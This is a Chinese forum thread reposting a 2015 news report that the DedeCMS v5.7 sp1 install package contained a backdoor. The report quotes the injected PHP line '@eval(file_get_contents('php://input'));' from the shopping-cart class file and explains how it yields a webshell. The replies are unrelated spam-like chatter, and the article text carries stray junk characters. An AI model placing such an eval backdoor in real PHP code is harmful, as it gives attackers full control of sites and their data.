12下一页
返回列表 发新帖

织梦CMS系统被曝植入后门 70万网站资料或泄露

459.3k 15
kjeittccdf 发表于 2015-3-30 15:29:14|湖北 | 查看全部 阅读模式
网易科技讯 3月22日消息,瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7  sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。- I) {" T0 |  v( ~9 g
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
6 N& v; G8 u8 c$ t% y. r安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)
" Q4 @( W# T* o% K2 A! a4 ?

织梦dedeCMS中被植入的后门代码

织梦dedeCMS中被植入的后门代码
0 e  k% n. g, v# U6 j, }: k) f
织梦CMS中被植入的后门代码

7 a2 i3 ~8 q$ G4 h延伸阅读:
# W3 w) @, Y4 r  |3 R0 C/ m4 I/ o, u

回复|共 15 个

seazvyt 发表于 2016-1-18 18:21:39|波兰 | 查看全部
为了不让帖子沉得太快!!!为了人人知道这个~!! 我不是原创~!!但是我要把他发扬广大~!!!
wwzcdenleclv 发表于 2016-1-18 18:20:50|非洲 | 查看全部
今天统计好像出了问题
mwxny 发表于 2016-1-18 18:22:01|印度 | 查看全部
哈哈~` 你好有意思哦~
seazvyt 发表于 2016-1-18 18:20:56|法国 | 查看全部
来电来函..欢迎洽购...
wwzcdenleclv 发表于 2016-1-18 18:22:22|美国 | 查看全部
哎 天理何在啊??
wwdu926a 发表于 2016-1-25 18:04:15|日本 | 查看全部
有现实中的偶在这...不佩服.............佩服电影里的....
tohme 发表于 2016-1-25 18:04:53|美国 | 查看全部
我想骂我自己
buingeEvineus 发表于 2016-1-25 18:04:36|Reserved | 查看全部
真是天底下好事多多
wwdu926a 发表于 2016-1-25 18:04:08|法国 | 查看全部
k了我一个月的站,刚才site的时候
wwzcdenleclv 发表于 2016-1-25 18:04:11|美国 | 查看全部
这个站一周前刚刚有了点起色
wwzcdenleclv 发表于 2017-4-11 15:12:47|中国 | 查看全部
哥们,给我做个链接吧
Acropozelan 发表于 2017-4-11 15:06:28|意大利 | 查看全部
晚安 别让小嫁再郁闷了 -
seazvyt 发表于 2017-4-11 15:12:13|Reserved | 查看全部
看,刚说你眼神不好,你还就来劲了不是.
Mqokjdvq 发表于 2017-4-11 15:12:13|美国 | 查看全部
我不知道他说的是什么啊~~

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 得知互动-专注Ai与站长技术交流社区-Ai交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表